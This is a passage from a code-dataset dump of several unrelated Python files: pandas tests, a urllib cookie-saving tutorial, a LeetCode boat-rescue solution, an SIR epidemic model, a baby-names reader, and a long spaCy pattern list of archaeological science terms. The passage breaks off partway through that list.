print(data.text)\n","repo_name":"Kunal-J15/Pixela","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"71761077766","text":"import pandas as pd\nimport os\n\n\ndef test_read_excel():\n excel = os.path.join(os.path.dirname(__file__), \"position.xlsx\")\n\n df = pd.read_excel(excel, convert_float=False, index_col=0)\n print(df)\n\n\ndef test_split():\n df = pd.read_csv(os.path.join(os.path.dirname(__file__), 'address_data.csv'), index_col=0)\n df['state'] = df['place_with_parent_names'].str.split('|', expand=True)[2]\n print(df)\n","repo_name":"xjohnwu/python_features","sub_path":"tests/dataframetests/test_dataframe_read.py","file_name":"test_dataframe_read.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38655501673","text":"import http.cookiejar\nimport urllib.request\n\ncookie = http.cookiejar.CookieJar()\nhandler = urllib.request.HTTPCookieProcessor(cookie)\nopener = urllib.request.build_opener(handler)\nresponse = opener.open('http://www.baidu.com')\nfor item in cookie:\n print(item.name+\"=\"+item.value)\nprint(response)\n\n# 保存cookie txt格式\ncookie1 = http.cookiejar.MozillaCookieJar('cookies.txt')\n# 缺少中间几部生成的cookies文件没有内容\ncookie1.save(ignore_discard=True, ignore_expires=True)\n\n# 保存cookie为LWP格式\ncookie2 = http.cookiejar.LWPCookieJar('cookie2.txt')\nhandler = urllib.request.HTTPCookieProcessor(cookie2)\nopener = urllib.request.build_opener(handler)\nresponse = opener.open('http://www.baidu.com')\ncookie2.save(ignore_discard=True, ignore_expires=True)\n\n# 调用cookie\ncookie3 = http.cookiejar.LWPCookieJar()\ncookie3.load('cookie2.txt', ignore_discard=True, ignore_expires=True)\nhandler = urllib.request.HTTPCookieProcessor(cookie3)\nopener = urllib.request.build_opener(handler)\nresponse = opener.open('http://www.baidu.com')\nprint(response.read().decode('utf-8'))","repo_name":"dianligegege/learn-Python","sub_path":"spider/基本库的使用/urllib/发送请求/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24517310953","text":"# 题目:881.救生艇\n# 难度:MEDIUM\n# 最后提交:2022-06-06 19:13:09 +0800 CST\n# 语言:python3\n# 作者:ZrjaK\n\nfrom sortedcontainers import SortedList\nclass Solution:\n def numRescueBoats(self, people: List[int], limit: int) -> int:\n s = SortedList(people)\n ans = 0\n while s:\n k = s[-1]\n s.remove(k)\n t = s.bisect_right(limit-k)\n if s and t > 0 and s[t-1] + k <= limit:\n s.pop(t-1)\n ans += 1\n return ans","repo_name":"ZrjaK/algorithm","sub_path":"OJ/leetcode/881.救生艇.py","file_name":"881.救生艇.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41337087403","text":"import scipy.integrate as spi\nimport numpy as np\nimport pylab as pl\n\nbeta=1.4247\ngamma=0.14286\nTS=1.0\nND=70.0\nS0=1-1e-6\nI0=1e-6\nINPUT = (S0, I0, 0.0)\n\n\ndef SIR(x,t): \n\t'''The main set of equations'''\n\tY = np.zeros((3))\n\tX = x\n\tY[0] = - beta * X[0] * X[1] # this is S\n\tY[1] = beta * X[0] * X[1] - gamma * X[1] # this is I\n\tY[2] = gamma * X[1] # this is R\n\treturn Y # For odeint\n\nt_start = 0.0; t_end = ND; t_inc = TS\nt_range = np.arange(t_start, t_end+t_inc, t_inc)\nRES = spi.odeint(SIR,INPUT,t_range)\n\nprint(RES)\n\n#Ploting\npl.subplot(211)\npl.plot(RES[:,0], '-g', label='Susceptibles')\npl.plot(RES[:,2], '-k', label='Recovereds')\npl.legend(loc=0)\npl.title('SIR')\npl.xlabel('Time')\npl.ylabel('Susceptibles and Recovereds')\npl.subplot(212)\npl.plot(RES[:,1], '-r', label='Infectious')\npl.xlabel('Time')\npl.ylabel('Infectious')\npl.show()\n","repo_name":"taylor-js/SIRModels","sub_path":"SIR.py","file_name":"SIR.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70880121605","text":"##\n# Reads baby names from files and makes lists of all the distinct boys and girls names\n#\n\ngirls = []\nboys = []\n\nfor year in range(1900, 2013):\n girl_fname = f\"BabyNames/{year}_GirlsNames.txt\"\n boy_fname = f\"BabyNames/{year}_BoysNames.txt\"\n\n inf = open(girl_fname)\n for line in inf:\n parts = line.split()\n name = parts[0]\n if name not in girls:\n girls.append(name)\n inf.close()\n\n inf = open(boy_fname)\n for line in inf:\n parts = line.split()\n name = parts[0]\n if name not in boys:\n boys.append(name)\n inf.close()\n\nprint(sorted(boys))\nprint(sorted(girls))\n","repo_name":"nmoore32/Python-Workbook","sub_path":"7 Files and Exceptions/exercise166.py","file_name":"exercise166.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41066825749","text":"patterns_en_FISH_ARCHSCIENCE = [\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144514\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"alpha\"},\r\n\t\t\t{\"LOWER\": \"spectrometry\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142099\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"altered\"},\r\n\t\t\t{\"LOWER\": \"by\"},\r\n\t\t\t{\"LOWER\": \"animals\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142100\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"amino\"},\r\n\t\t\t{\"LOWER\": \"acid\"},\r\n\t\t\t{\"LOWER\": \"racemisation\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142101\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"ancient\"},\r\n\t\t\t{\"LOWER\": \"biomolecular\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142102\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"anoxic\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142103\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"antler\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170618\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"archaeobotany\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142104\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"archaeomagnetism\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170615\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"archaeomalacology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170616\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"archaeozoology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142105\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"aspect\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142106\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"available\"},\r\n\t\t\t{\"LOWER\": \"phosphorus\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142981\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"beach\"},\r\n\t\t\t{\"LOWER\": \"deposit\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170621\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"bioarchaeology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144519\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"biogenic\"},\r\n\t\t\t{\"LOWER\": \"carbonate\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142107\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"biostratigraphy\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142108\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"block\"},\r\n\t\t\t{\"LOWER\": \"lifting\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142109\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"bone\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144515\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"brick\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142122\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"bulk\"},\r\n\t\t\t{\"LOWER\": \"sampling\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142111\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"burnt\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142111\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"burnt\"},\r\n\t\t\t{\"LOWER\": \"deposit\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144517\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"burnt\"},\r\n\t\t\t{\"LOWER\": \"flint\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142188\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"c14\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142113\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"calcined\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142188\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"carbon\"},\r\n\t\t\t{\"LOWER\": \"14\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142188\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"carbon\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142118\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"carbonised\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/148327\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"carved\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142117\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"charcoal\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142118\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"charred\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142119\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"chemical\"},\r\n\t\t\t{\"LOWER\": \"techniques\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142120\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"chemically\"},\r\n\t\t\t{\"LOWER\": \"altered\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142121\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"clast\"},\r\n\t\t\t{\"LOWER\": \"lithological\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142122\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"coarse\"},\r\n\t\t\t{\"LOWER\": \"sieving\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142124\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"colored\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142124\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"coloured\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142125\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"copper\"},\r\n\t\t\t{\"LOWER\": \"alloy\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142126\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"coprolite\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142113\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"cremated\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142128\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"dating\"},\r\n\t\t\t{\"LOWER\": \"techniques\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142129\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"decorated\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142129\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"decoration\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142131\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"dendrochronology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142132\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"desiccated\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170614\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"diatom\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142180\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"disease\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142180\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"diseased\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142135\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"egg\"},\r\n\t\t\t{\"LOWER\": \"shell\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142136\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"electron\"},\r\n\t\t\t{\"LOWER\": \"spin\"},\r\n\t\t\t{\"LOWER\": \"resonance\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142977\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"estuarine\"},\r\n\t\t\t{\"LOWER\": \"deposit\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142137\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"feather\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144521\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"feldspar\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142138\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"ferrous\"},\r\n\t\t\t{\"LOWER\": \"metal\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142139\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"fibre\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142140\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"fission\"},\r\n\t\t\t{\"LOWER\": \"track\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/148433\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"flot\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142141\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"flotation\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142142\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"fluorine,\"},\r\n\t\t\t{\"LOWER\": \"uranium\"},\r\n\t\t\t{\"LOWER\": \"and\"},\r\n\t\t\t{\"LOWER\": \"nitrogen\"},\r\n\t\t\t{\"LOWER\": \"tests\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170619\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"foraminifera\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142167\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"fossilised\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142144\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"fungal\"},\r\n\t\t\t{\"LOWER\": \"damage\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144513\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"gamma\"},\r\n\t\t\t{\"LOWER\": \"spectrometry\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144518\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"geological\"},\r\n\t\t\t{\"LOWER\": \"sediment\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142145\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"gold\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142146\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"hair\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142147\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"hand\"},\r\n\t\t\t{\"LOWER\": \"retrieval\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/148434\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"heavy\"},\r\n\t\t\t{\"LOWER\": \"residue\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142148\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"human\"},\r\n\t\t\t{\"LOWER\": \"aspects\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170621\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"human\"},\r\n\t\t\t{\"LOWER\": \"osteology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142149\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"hydrolysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142151\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"irsl\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142151\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"irsl\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142150\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"impression\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142151\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"infra-red\"},\r\n\t\t\t{\"LOWER\": \"stimulated\"},\r\n\t\t\t{\"LOWER\": \"luminescence\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142152\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"inorganic\"},\r\n\t\t\t{\"LOWER\": \"phosphorus\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142153\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"investigative\"},\r\n\t\t\t{\"LOWER\": \"techniques\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142154\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"ivory\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142155\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"lead\"},\r\n\t\t\t{\"LOWER\": \"isotope\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142156\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"leather\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142157\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"loss\"},\r\n\t\t\t{\"LOWER\": \"on\"},\r\n\t\t\t{\"LOWER\": \"ignition\"},\r\n\t\t\t{\"LOWER\": \"determination\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144511\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"luminescence\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142158\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"magnetic\"},\r\n\t\t\t{\"LOWER\": \"susceptibility\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142159\",\r\n \"label\": 